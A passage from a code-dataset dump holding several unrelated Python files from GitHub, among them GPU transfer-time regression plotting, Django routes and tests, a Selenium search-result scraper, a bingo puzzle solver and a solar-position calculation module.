#temp[-1] != 'synth\\n':\n if bytes[-1] != int(temp[0]):\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n else:\n print('Duplicate entry found for %d bytes' % bytes[-1])\n x = np.array(bytes).reshape(-1, 1)\n y = np.array(time)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n from scipy.interpolate import interp1d\n f = interp1d(bytes, time, kind='linear')\n f1 = interp1d(bytes, time, kind='zero')\n f2 = interp1d(bytes, time, kind='slinear')\n f3 = interp1d(bytes, time, kind='quadratic')\n f4 = interp1d(bytes, time, kind='cubic')\n return model.predict, f, f1, f2, f3, f4\n\nf_send_bound_regresion = linearize_cpu_to_gpu()\nf_send_reg, f_send_inter_linear, f_send_inter_zero, f_send_inter_slinear, f_send_inter_quadratic, f_send_inter_cubic = t_transfer_to_gpu()\nf_recv_bound_regresion = linearize_gpu_to_cpu()\nf_recv_reg, f_recv_inter_linear, f_recv_inter_zero, f_recv_inter_slinear, f_recv_inter_quadratic, f_recv_inter_cubic = t_transfer_from_gpu()\ndef t_memcpy(bytes, src, dest):\n if(bytes < 0):\n return 0 #float(\"inf\")\n elif (bytes < 1):\n return 0\n # For now only for dev0 <-> host\n elif (src == -1 and dest == 0):\n ctr = 0\n for bound in bounds:\n if bytes < bound:\n return f_send_bound_regresion[ctr](np.array(bytes).reshape(-1, 1))\n ctr +=1\n return f_send_bound_regresion[-1](np.array(bytes).reshape(-1, 1))\n elif (src == 0 and dest == -1):\n ctr = 0\n for bound in bounds:\n if bytes < bound:\n return f_recv_bound_regresion[ctr](np.array(bytes).reshape(-1, 1))\n ctr +=1\n return f_recv_bound_regresion[-1](np.array(bytes).reshape(-1, 1))\n\ndef plot_transfers(plot_up_bound):\n plot_down_bound = 0\n xnew = np.linspace(plot_down_bound, plot_up_bound, num=200, endpoint=True)\n time = [[0],[0]]\n bytes = [[0],[0]]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0 and int(temp[0])<=plot_up_bound: #temp[-1] != 'synth\\n':\n if bytes[0][-1] != int(temp[0]):\n time[0].append(float(temp[3]))\n bytes[0].append(int(temp[0]))\n elif int(temp[1]) == 0 and int(temp[2]) == -1 and int(temp[0])<=plot_up_bound:\n if bytes[1][-1] != int(temp[0]):\n time[1].append(float(temp[3]))\n bytes[1].append(int(temp[0]))\n import matplotlib.pyplot as plt\n plt.plot(bytes[0], time[0], 'o', bytes[0],f_send_reg(np.array(bytes[0]).reshape(-1, 1)), '-', bytes[0], f_send_inter_linear(bytes[0]), '-', bytes[0], list(map(lambda x: t_memcpy(x,-1,0), bytes[0])), '-')\n # plt.xscale('log')\n plt.legend(['Host->Device(Samples)', 'Host->Device(Single Linear regression)', 'Host->Device(interpolate linear)', 'Host->Device(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Time(s)')\n plt.xlabel('Bytes')\n plt.title('PCI-e Time (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Time_'+ machine + '_' + str(plot_up_bound) + '_bytes_host_to_device.eps', format='eps')\n plt.close()\n plt.plot(bytes[1], time[1], 'o', bytes[1],f_recv_reg(np.array(bytes[1]).reshape(-1, 1)), '-', bytes[1], f_recv_inter_linear(bytes[1]), '-', bytes[1], list(map(lambda x: t_memcpy(x,0,-1), bytes[1])), '-')\n # plt.xscale('log')\n plt.legend(['Device->Host(Samples)', 'Device->Host(Single Linear regression)', 'Device->Host(interpolate linear)', 'Device->Host(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Time(s)')\n plt.xlabel('Bytes')\n plt.title('PCI-e Time (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Time_'+ machine + '_' + str(plot_up_bound) + '_bytes_device_to_host.eps', format='eps')\n plt.close()\n\n plt.plot( bytes[0],predict_error(time[0], f_send_reg(np.array(bytes[0]).reshape(-1, 1))), '-', bytes[0], predict_error(time[0], f_send_inter_linear(np.array(bytes[0]).reshape(-1, 1))), '-', bytes[0], predict_error(time[0], list(map(lambda x: t_memcpy(x,-1,0), bytes[0]))) , '-')\n # plt.xscale('log')\n plt.legend([ 'Host->Device(Single Linear regression)', 'Host->Device(interpolate linear)', 'Host->Device(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Error(0-1)')\n plt.xlabel('Bytes')\n plt.title('Prediction Error (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Error_'+ machine + '_' + str(plot_up_bound) + '_bytes_host_to_device.eps', format='eps')\n plt.close()\n plt.plot( bytes[1],predict_error(time[1], f_recv_reg(np.array(bytes[1]).reshape(-1, 1))), '-', bytes[1], predict_error(time[1], f_recv_inter_linear(np.array(bytes[1]).reshape(-1, 1))), '-', bytes[1], predict_error(time[1], list(map(lambda x: t_memcpy(x,0,-1), bytes[1]))) , '-')\n # plt.xscale('log')\n plt.legend(['Device->Host(Single Linear regression)', 'Device->Host(interpolate linear)', 'Device->Host(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Error(0-1)')\n plt.xlabel('Bytes')\n plt.title('Prediction Error (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Error_'+ machine + '_' + str(plot_up_bound) + '_bytes_device_to_host.eps', format='eps')\n plt.close()\n\n\nplot_transfers(1e4)\nplot_transfers(1e5)\nplot_transfers(1e6)\n\n","repo_name":"p-anastas/Heter_BLAS_explore","sub_path":"test_possible_functions.py","file_name":"test_possible_functions.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14637400199","text":"from django.urls import path\nfrom .api_views import NotificationsModelViewSet\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom .api_views import TokenView\n\n\nurlpatterns = [\n path('notifications/', NotificationsModelViewSet.as_view(\n {\n 'get':'list',\n 'post':'create', \n }\n )\n ),\n\n path('notifications/', NotificationsModelViewSet.as_view(\n {\n 'get_by_id':'retrieve',\n 'put':'update',\n 'patch':'partial_update',\n 'delete':'destroy'\n }\n )),\n # We can use TokenView.TokenObtainPairView())view from library instead of custom class TokenView() that we created\n path('auth/token/', TokenView.as_view()) \n \n]","repo_name":"ibrahimshaabann/Xware-BootCamp","sub_path":"Content/week6/Day4/Notifications/NotificationsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9006315446","text":"import matplotlib\nmatplotlib.use('WXAgg')\n\nclass Settings():\n def __init__(self):\n #Constructor\n #Set variables to the default\n self.colLength = 1.0\n self.colDiameter = 4.0\n self.arduinoPath = \"/dev/ttyACM0\"\n self.enableSimulation = \"False\"\n\n \n def loadSettings(self):\n #Read in Settings\n try:\n file1 = open(\"settings.ini\", \"r\")\n SettingsFile = file1.readlines() \n file1.close()\n \n print(SettingsFile)\n \n for x in SettingsFile:\n ID = (x[0:x.find(\"=\")]) \n value = (x[x.find(\"=\")+1 :]) \n \n if (ID == \"COLUMN_LENGTH\"): self.colLength = float(value)\n if (ID == \"COLUMN_DIAMETER\"): self.colDiameter = float(value)\n if (ID == \"ARDUINO_PATH\"): self.arduinoPath = str(value[:-1]) #Cut-off \\n\n if (ID == \"SIMULATION\"): self.enableSimulation = str(value[:-1]) #Cut-off \\n\n \n except:\n print(\"ERROR while loading settings data\")\n \n def saveSettings(self):\n try:\n #Write Settings file\n f = open(\"settings.ini\", \"w\")\n f.write(\"COLUMN_LENGTH=\" + str(self.colLength) + \"\\n\") \n f.write(\"COLUMN_DIAMETER=\" + str(self.colDiameter) + \"\\n\")\n f.write(\"ARDUINO_PATH=\" + str(self.arduinoPath) + \"\\n\")\n f.write(\"SIMULATION=\" + str(self.enableSimulation) + \"\\n\") \n f.close()\n except:\n print(\"ERROR while saving settings data\")\n \n","repo_name":"JoStoe/GCControl","sub_path":"src/SettingsClass.py","file_name":"SettingsClass.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42078055080","text":"import pandas as pd\nimport shapely.geometry\nimport xarray as xr\nimport tracpy\nimport matplotlib.pyplot as plt\nimport cartopy\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport cmocean.cm as cmo\nimport matplotlib as mpl\nimport numpy as np\nimport os\n\n# load in gulf ssh\nloc = 'output/*.nc'\nds = xr.open_mfdataset(loc)\nlats = ds['latitude']\nlons = ds['longitude']\n# grid_file = '../gom03_grd_N050_new.nc'\n# grid = xr.open_dataset(grid_file)\n# proj = tracpy.tools.make_proj('nwgom-pyproj')\n# grid = tracpy.inout.readgrid(grid_file, proj=proj)\n\n# load in drifter data\ndfmix = pd.read_csv('drifter-09_04_18-07_37.csv', usecols=[0,1,4,5], parse_dates=True, index_col=1)\ndfmix = dfmix[::-1]\ndrifters = list(dfmix['DeviceName'].unique()) # drifter names\n\n# interpolate all drifters to standard times\n# each df in dfs is a drifter lon/lat\n# start when drifter is near eddy, but at hour\ndstart = '2018-8-12 18:00' # dfmix.index[(dfmix['Longitude'] < -90) * (dfmix['Latitude'] < 28)][0].floor('H')\nindices = pd.date_range(start=dstart, end=dfmix.index.max(), freq='6H')\ndfs = []\nfor drifter in drifters:\n df = pd.DataFrame(index=indices)\n df = dfmix[dfmix['DeviceName']==drifter].resample('1H', base=0).mean()\n dfs.append(df)\n\n# plot prep\nland_50m = cartopy.feature.NaturalEarthFeature('physical', 'land', '50m')\npc = cartopy.crs.PlateCarree()\nmerc = cartopy.crs.Mercator(central_longitude=-85.0)\nextent = [-98, -85, 22, 31]\n\n# loop over drifter times\nfor index in indices:\n\n fname = 'figures/%s.png' % (index.isoformat()[:13])\n\n if os.path.exists(fname):\n continue\n\n fig = plt.figure(figsize=(8,6))# (9.4, 7.7))\n ax = fig.add_subplot(111, projection=merc)\n # ax = fig.add_axes([0.06, 0.01, 0.93, 0.95], projection=merc)\n ax.set_extent(extent, pc)\n gl = ax.gridlines(linewidth=0.2, color='gray', alpha=0.5, linestyle='-', draw_labels=True)\n # the following two make the labels look like lat/lon format\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlocator = mpl.ticker.FixedLocator(np.arange(-100, -70, 2))\n gl.ylocator = mpl.ticker.FixedLocator(np.arange(10, 31, 2))\n gl.xlabels_top = False # turn off labels where you don't want them\n gl.ylabels_right = False\n # add background land\n ax.add_feature(land_50m, facecolor='0.8', edgecolor='0.2', linewidth=1)\n\n # use nearest model output\n ssh = ds['zos'].sel(time=index, method='nearest')\n u = ds['uo'].sel(time=index, method='nearest').isel(depth=0)\n v = ds['vo'].sel(time=index, method='nearest').isel(depth=0)\n\n mappable = ax.pcolormesh(lons, lats, ssh, transform=pc,\n cmap=cmo.balance, vmin=-0.5, vmax=0.5)\n cb = fig.colorbar(mappable, shrink=0.8, extend='both')\n cb.set_label('Sea surface height [m]')\n\n # overlay velocities\n dd = 5\n ax.quiver(lons[::dd].values, lats[::dd].values,\n u[::dd,::dd].values, v[::dd,::dd].values, transform=pc, alpha=0.6)\n\n\n # overlay drifters\n for i in range(3):\n try:\n lat, lon = dfs[i].loc[index]\n ax.plot(lon, lat, 'ok', transform=pc)\n except:\n pass\n\n ax.set_title(index.strftime('%b %d %H:%M, %Y'))\n\n # add labels\n # drifter legend\n ax2 = fig.add_axes([0.125, 0.625, 0.15, 0.2], frameon=False)\n ax2.scatter([], [], c='0.2', s=30, marker='o', label='Drifter')\n ax2.legend(scatterpoints=1, frameon=False, loc='upper left')\n ax2.set_axis_off()\n # label mercator\n ax.text(0.3, 0.96, 'Mercator model output', color='0.2', transform=ax.transAxes)\n # my name\n ax.text(0.8, 0.96, 'K. Thyng', color='0.2', transform=ax.transAxes)\n\n\n fig.savefig(fname, bbox_inches='tight')\n plt.close(fig)\n","repo_name":"kthyng/oem","sub_path":"drifter_animation/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37259267085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 28 09:50:47 2022\n\n@author: Marcu\n\"\"\"\nimport numpy as np\n\nfrom itertools import groupby\nfrom operator import itemgetter\n\n#%% Image preprocessing\n\ndef grassfire(img, N,p):\n # Function which finds pixels that deviate by more than p percent\n # from the average pixelvalue in an NxN neighborhood\n \n #INPUT\n #img: binary or greyscale image\n #N: half of width of neighborhood\n #p: percentwise difference required to denote a pixel as an \"island\"\n \n #OUTPUT\n #Binary image, showing the \"islands\" in the image with the pixelvalue \"1\"\n \n \n n,m = np.shape(img)\n mask = np.zeros((n,m))\n for i in range(n):\n for j in range(m):\n l = N\n r = N\n u = N\n d = N\n if i < N:\n u = i\n elif i > n-N:\n d = n-i-1\n if j < N:\n l = j\n elif j > m-N:\n r = m-j-1\n kern = img[i-u:i+d,j-l:j+r]\n nk,mk = np.shape(kern)\n avg = sum(sum(kern))/(nk*mk)\n deviate = abs((avg-img[i,j])/avg)\n if deviate > 0.15:\n mask[i,j] = 1\n return mask\n\n\ndef find_lines(img,tol):\n #finds vertical black lines in an image\n #\n #INPUT\n #img: greyscale image\n #tol: line pixelvalue threshold\n \n #OUTPUT\n #lines: column indexes for vertical lines\n\n n,m = np.shape(img)\n lines = []\n for j in range(1,m):\n avg = sum(img[:,j])/n\n if avg < tol:\n lines.append(j)\n return lines\n\ndef remove_lines(img,lines):\n #removes vertical lines from image\n \n #INPUT\n #img: grayscale image\n #lines: column index for vertical lines\n \n #OUTPUT\n #img: Image without vertical lines\n lines = sorted(set(lines))\n gaps = [[s, e] for s, e in zip(lines, lines[1:]) if s+1 < e]\n edges = iter(lines[:1] + sum(gaps, []) + lines[-1:])\n edges = list(zip(edges, edges))\n for edge in edges:\n try:\n filt = (img[:,edge[0]-3] + img[:,edge[1]+3])/2\n except IndexError:\n if edge[0]<3:\n filt = img[:,edge[1]+3]\n else:\n filt = img[:,edge[0]-3]\n continue\n \n for line in range(edge[0]-2,edge[1]+2):\n img[:,line] = filt\n return img\n \n \n\n \n \n","repo_name":"MarcusGalea/Bachelor-project","sub_path":"scripts/preprocessing/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22068928699","text":"import pytest\nfrom credit.models import Credit\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom tests import factories\n\n\n@pytest.mark.usefixtures(\n \"auth_user\",\n \"client\",\n \"credit_data\",\n \"account_credit_data\",\n \"agreement_credit_data\",\n \"payment_schedule_credit_data\",\n)\nclass TestCreditPaymant:\n @pytest.mark.django_db\n def test_credit_product_get_request_auth_user(\n self,\n auth_user,\n client,\n ):\n client.force_authenticate(user=auth_user)\n factories.Credit()\n response = client.get(\n path=reverse(\"credit:get_credit_payment_schedule\", kwargs={\"creditId\": 1})\n )\n assert len(Credit.objects.all()) == 1\n assert response.status_code == status.HTTP_200_OK\n","repo_name":"x3m4ikc/bank_service_credit","sub_path":"tests/credit/test_credit_shedule.py","file_name":"test_credit_shedule.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10761102127","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\n\"\"\" driver = webdriver.Chrome(executable_path='C:\\\\Users\\Dell\\Desktop\\Growbydata\\chromedriver.exe') \n\ndriver.get('https://www.google.com/search?q=amazon&rlz=1C1GCEB_enNP875NP875&biw=1536&bih=431&sxsrf=ALiCzsaM83EX1Kbm7f6MCjmao8tmQhKQ-w%3A1670391889539&ei=USiQY7rEILmuseMPwbKU2A4&ved=0ahUKEwj6sNjZ5ub7AhU5V2wGHUEZBesQ4dUDCA8&uact=5&oq=amazon&gs_lcp=Cgxnd3Mtd2l6LXNlcnAQAzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQR0oECEEYAEoECEYYAFD5A1j5A2DvBWgAcAJ4AIABAIgBAJIBAJgBAKABAcgBCMABAQ&sclient=gws-wiz-serp')\n \"\"\"\ndriver = webdriver.Chrome(executable_path='C:\\\\Users\\Dell\\Desktop\\Growbydata\\chromedriver.exe')\ndriver.implicitly_wait(2) \ndriver.get(\"https://www.google.com/\") \n\n\nclass A:\n\n def search():\n x= input(\"enter any value \")\n return x\n driver.find_element_by_name(\"q\").send_keys(search()) \n #click on the Google search button \n driver.find_element_by_xpath('//body/div[1]/div[3]/form[1]/div[1]/div[1]/div[4]/center[1]/input[1]').click()\n print(driver.title)\n\n\ndesc=driver.find_elements(By.XPATH,'//div[@class=\"VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc lEBKkf\"] | //div[@class=\"VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc\"]')\ndesc_list=[]\nfor d in desc:\n if d.text ==\"\":\n desc_list.append(\"(Not Found)\")\n else: \n desc_list.append(d.text)\nprint(desc_list)\n\n\n\n\n#dont Touch\ntitle=driver.find_elements(By.XPATH, '//div[@class=\"yuRUbf\"]//h3[@class=\"LC20lb MBeuO DKV0Md\"]')\ntitle_list=[]\nfor t in title:\n if t.text ==\"\":\n title_list.append(\"(Not Found)\")\n else: \n title_list.append(t.text)\nprint(title_list)\n\n\n\n#dont Touch\nLink=driver.find_elements(By.XPATH, '//div[@class=\"TbwUpd NJjxre\"]//cite')\nLink_list=[]\nfor L in Link:\n if L.text ==\"\":\n Link_list.append(\"(Not Found)\")\n else: \n Link_list.append(L.text)\nprint(Link_list)\n\nthis_dics={\n \"desc\":desc_list[:],\n \"links\":Link_list[:],\n \"title\":title_list[:]\n}\nprint(this_dics)\ndriver.quit()\nprint(len(desc_list))\nprint(len(Link_list))\nprint(len(title_list))\n\n\nnew = pd.DataFrame.from_dict(this_dics)\n \nnew.to_csv('this2.csv')","repo_name":"Abhishekkc010/seleniumwebscrape","sub_path":"orgamazon.py","file_name":"orgamazon.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1197299250","text":"# a = int(input())\n# b = int(input())\n# print(f'Квадрат суммы {a} и {b} равен', (a+b)**2)\n# print(f'Сумма квадратов {a} и {b} равна', a**2 + b**2)\na = int(input())\nb = int(input())\nc = int(input())\n# d = int(input())\nsumma = 0\nif a > 0:\n summa = summa + a\nif b > 0:\n summa = summa + b\nif c > 0:\n summa = summa + c\nprint(summa)\n# ab = 0\n# cd = 0\n# if a <= 13:\n# print('детство')\n# elif a <= 24:\n# print('молодость')\n# elif a <= 59:\n# print('зрелость')\n# elif a >= 60:\n# print('старость')\n\n# print(a**b + c**d)\n#a = int(input())\n# aa = 10*a + a\n# aaa = 100*a + aa\n# print(a + aa + aaa)\n# n = int(input())\n# print(n * 123)\n","repo_name":"Let0Pda/Python_Lectures","sub_path":"stepik.py","file_name":"stepik.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19483588525","text":"import copy\nfrom copy import deepcopy\n\n\ndef bingo_round(number, board):\n bingo = False\n for row in range(len(board)):\n for column in range(len(board[row])):\n if board[row][column] == number:\n board[row][column] = None\n board_column = [board[i][column] for i in range(len(board))]\n board_row = board[row]\n if (board_row[0] is None and len(set(board_row)) == 1) or (\n board_column[0] is None and len(set(board_column)) == 1\n ):\n bingo = True\n return bingo\n\n\ndef play_bingo(numbers, boards):\n winning_board = None\n bingo = False\n for number in numbers:\n for board in boards:\n current_board_bingo = bingo_round(number, board)\n if current_board_bingo and not bingo:\n bingo = True\n winning_board = board\n if bingo:\n return True, number, winning_board\n return False, number, None\n\n\ndef calculate_board_sum_unmarked(board):\n sum = 0\n for row in board:\n for num in row:\n if num:\n sum += num\n return sum\n\n\ndef puzzle1(data):\n numbers, boards = data\n bingo, number, board = play_bingo(numbers, boards)\n if bingo:\n sum = calculate_board_sum_unmarked(board)\n print(\"Puzzle 1: \", sum * number)\n else:\n print(\"Puzzle 1: no board won, should not happen\")\n\n\ndef puzzle2(data):\n numbers, boards = data\n last_winning_board = None\n last_winning_number = None\n for number in numbers:\n winning_boards = []\n for board in boards:\n bingo = bingo_round(number, board)\n if bingo:\n winning_boards.append(board)\n last_winning_board = board\n last_winning_number = number\n for board in winning_boards:\n boards.remove(board)\n sum = calculate_board_sum_unmarked(last_winning_board)\n print(\"Puzzle 1: \", sum * last_winning_number)\n\n\ndef parse_input(data):\n numbers_line = data.split(\"\\n\")[0]\n numbers = [int(n) for n in numbers_line.split(\",\")]\n board_lines = data.split(\"\\n\\n\")[1:]\n boards = []\n for board_line in board_lines:\n board = []\n for line in board_line.split(\"\\n\"):\n if line.strip() != \"\":\n board_numbers = []\n board_numbers_splitted = line.split(\" \")\n for number in board_numbers_splitted:\n if number:\n board_numbers.append(int(number))\n board.append(board_numbers)\n boards.append(board)\n return numbers, boards\n\n\ndef main():\n with open(\"input/input_day04.txt\") as f:\n data = f.read()\n data = parse_input(data)\n puzzle1(copy.deepcopy(data))\n puzzle2(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Horrendus/advent_of_code","sub_path":"2021/2021_day04.py","file_name":"2021_day04.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"37372529592","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif']='SimHei' #设置中文字体\nn=24\ny1=np.random.randint(27,37,n) #温度\ny2=np.random.randint(40,60,n) #湿度\nplt.plot(y1,label='温度')\nplt.plot(y2,label='湿度')\n\nplt.xlim(0,23) #设置x轴长度\nplt.ylim(20,70)\nplt.xlabel('小时',fontsize=12)\nplt.ylabel('测量值',fontsize=12)\n\nplt.title('24小时温度湿度统计',fontsize=16)\n\nplt.legend() #显示图例\nplt.show()","repo_name":"chaozuoye/ai","sub_path":"神网/unit6/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71163252065","text":"\nimport math as m\nfrom soltrack.data import PI, TWO_PI, R2D\nfrom soltrack.dataclasses import Location, Position, copyDataclass\n\n\n\ndef computeSunPosition(location, time, useDegrees=False, useNorthEqualsZero=False, computeRefrEquatorial=False, computeDistance=False):\n \n \"\"\"\n Main function to compute the position of the Sun.\n \n Parameters:\n location (Location): Dataclass containing the geographic location to compute the Sun's position for.\n time (Time): Dataclass containing date and time to compute the position for, in UT.\n \n useDegrees (bool): Use degrees for input and output angular variables, rather than radians (optional, default=False).\n useNorthEqualsZero (bool): Use the definition where azimuth=0 denotes north, rather than south (optional, default=False).\n computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates (optional, default=False).\n computeDistance (bool): Compute distance to the Sun (optional, default=False).\n \n Returns:\n (Position): Dataclass containing the position of the Sun in horizontal (and equatorial if desired) coordinates (output).\n \n \"\"\"\n \n # If the used uses degrees, convert the geographic location to radians:\n # In C, a local copy of location is made. With Python dataclasses, this doesn't seem to work (pointer?)\n \n loc = copyDataclass(Location, location) # Local of the Location dataclass\n if(useDegrees):\n loc.longitude /= R2D\n loc.latitude /= R2D\n \n # Compute these once and reuse:\n loc.sinLat = m.sin(loc.latitude)\n loc.cosLat = m.sqrt(1.0 - loc.sinLat * loc.sinLat) # Cosine of a latitude is always positive or zero\n \n \n # Create a Position object, to return the results:\n position = Position()\n \n # Compute the Julian Day from the date and time:\n position.julianDay = computeJulianDay(time.year, time.month, time.day, time.hour, time.minute, time.second)\n \n \n # Derived expressions of time:\n position.tJD = position.julianDay - 2451545.0 # Time in Julian days since 2000.0\n position.tJC = position.tJD/36525.0 # Time in Julian centuries since 2000.0\n position.tJC2 = position.tJC*position.tJC # T^2\n \n \n # Compute the ecliptic longitude of the Sun and the obliquity of the ecliptic:\n computeLongitude(position, computeDistance)\n \n # Convert ecliptic coordinates to geocentric equatorial coordinates:\n position.rightAscension, position.declination = convertEclipticToEquatorial(position.longitude, position.cosObliquity)\n \n # Convert equatorial coordinates to horizontal coordinates, correcting for parallax and refraction:\n convertEquatorialToHorizontal(loc, position)\n \n \n # Convert the corrected horizontal coordinates back to equatorial coordinates:\n if(computeRefrEquatorial):\n position.hourAngleRefract,position.declinationRefract = \\\n convertHorizontalToEquatorial(loc.sinLat, loc.cosLat, position.azimuthRefract,\n position.altitudeRefract)\n \n # Use the North=0 convention for azimuth and hour angle (default: South = 0) if desired:\n if(useNorthEqualsZero):\n position.azimuthRefract, position.hourAngleRefract = setNorthToZero(position.azimuthRefract,\n position.hourAngleRefract,\n computeRefrEquatorial)\n \n # If the user wants degrees, convert final results from radians to degrees:\n if(useDegrees):\n convertRadiansToDegrees(position, computeRefrEquatorial)\n \n return position\n \n\n\ndef computeJulianDay(year, month, day, hour, minute, second):\n \"\"\"Compute the Julian Day from the date and time.\n \n Note:\n - Gregorian calendar only (>~1582).\n \n Parameters:\n year (int): Year of date.\n month (int): Month of date.\n day (int): Day of date.\n hour (int): Hour of time.\n minute (int): Minute of time.\n second (int): Second of time.\n \n Returns:\n float: Julian day for the given date and time.\n \n \"\"\"\n \n if(month <= 2): # Treat Jan, Feb as months 13, 14 of the previous year\n year -= 1\n month += 12\n \n tmp1 = m.floor(year/100.0)\n tmp2 = 2 - tmp1 + m.floor(tmp1/4.0)\n \n dDay = day + hour/24.0 + minute/1440.0 + second/86400.0\n JD = m.floor(365.250*(year+4716)) + m.floor(30.60010*(month+1)) + dDay + tmp2 - 1524.5\n \n return JD\n\n\n\ndef computeLongitude(position, computeDistance=False):\n \"\"\"Compute the ecliptic longitude of the Sun for a given instant.\n \n Note:\n - Also computes the obliquity of the ecliptic and nutation.\n \n Parameters:\n position (Position): Dataclass containing the position of the Sun (I/O).\n computeDistance (bool): Compute distance to the Sun (optional, default=False).\n \n \"\"\"\n \n l0 = 4.895063168 + 628.331966786 * position.tJC + 5.291838e-6 * position.tJC2 # Mean longitude\n ma = 6.240060141 + 628.301955152 * position.tJC - 2.682571e-6 * position.tJC2 # Mean anomaly\n \n sec = (3.34161088e-2 - 8.40725e-5* position.tJC - 2.443e-7*position.tJC2)*m.sin(ma) + \\\n (3.489437e-4 - 1.76278e-6*position.tJC)*m.sin(2*ma) # Sun's equation of the centre\n odot = l0 + sec # True longitude\n \n \n # Nutation, aberration:\n omg = 2.1824390725 - 33.7570464271 * position.tJC + 3.622256e-5 * position.tJC2 # Lon. of Moon's mean ascending node\n dpsi = -8.338601e-5*m.sin(omg) # Nutation in longitude\n dist = 1.0000010178 # Mean distance to the Sun in AU\n if(computeDistance):\n ecc = 0.016708634 - 0.000042037 * position.tJC - 0.0000001267 * position.tJC2 # Eccentricity of the Earth's orbit\n nu = ma + sec # True anomaly\n dist = dist*(1.0 - ecc*ecc)/(1.0 + ecc*m.cos(nu)) # Geocentric distance of the Sun in AU\n \n aber = -9.93087e-5/dist # Aberration\n \n # Obliquity of the ecliptic and nutation - do this here, since we've already computed many of the ingredients:\n eps0 = 0.409092804222 - 2.26965525e-4*position.tJC - 2.86e-9*position.tJC2 # Mean obliquity of the ecliptic\n deps = 4.4615e-5*m.cos(omg) # Nutation in obliquity\n \n # Save position parameters:\n position.longitude = (odot + aber + dpsi) % TWO_PI # Apparent geocentric longitude, referred to the true equinox of date\n \n position.distance = dist # Distance (AU)\n \n position.obliquity = eps0 + deps # True obliquity of the ecliptic\n position.cosObliquity = m.cos(position.obliquity) # Need the cosine later on\n position.nutationLon = dpsi # Nutation in longitude\n \n return\n\n\n\ndef convertEclipticToEquatorial(longitude, cosObliquity):\n \"\"\"Convert ecliptic coordinates to equatorial coordinates.\n \n Note:\n - This function assumes that the ecliptic latitude = 0.\n \n Parameters:\n longitude (float): Ecliptic longitude of the Sun (rad).\n cosObliquity (float): Cosine of the obliquity of the ecliptic.\n \n Returns:\n tuple (float,float): Tuple containing (rightAscension, declination):\n \n - rightAscension (float): Right ascension of the Sun (rad).\n - declination (float): Declination of the Sun (rad).\n \n \"\"\"\n \n sinLon = m.sin(longitude)\n sinObl = m.sqrt(1.0-cosObliquity*cosObliquity) # Sine of the obliquity of the ecliptic will be positive in the forseeable future\n \n rightAscension = m.atan2(cosObliquity*sinLon, m.cos(longitude)) % TWO_PI # 0 <= azimuth < 2pi\n declination = m.asin(sinObl*sinLon)\n \n return rightAscension, declination\n\n\ndef convertEquatorialToHorizontal(location, position):\n \"\"\"Convert equatorial to horizontal coordinates.\n \n Also corrects for parallax and atmospheric refraction.\n \n Parameters:\n location (Location): Dataclass contaning the geographic location of the observer (rad).\n position (Position): Dataclass contaning the position of the Sun (rad, I/O).\n \n \"\"\"\n \n gmst = 4.89496121 + 6.300388098985*position.tJD + 6.77e-6*position.tJC2 # Greenwich mean sidereal time\n position.agst = gmst + position.nutationLon * position.cosObliquity # Correction for equation of the equinoxes . apparent Greenwich sidereal time\n \n \n sinAlt=0.0\n # Azimuth does not need to be corrected for parallax or refraction, hence store the result in the 'azimuthRefract' variable directly:\n position.azimuthRefract, sinAlt = eq2horiz(location.sinLat,location.cosLat, 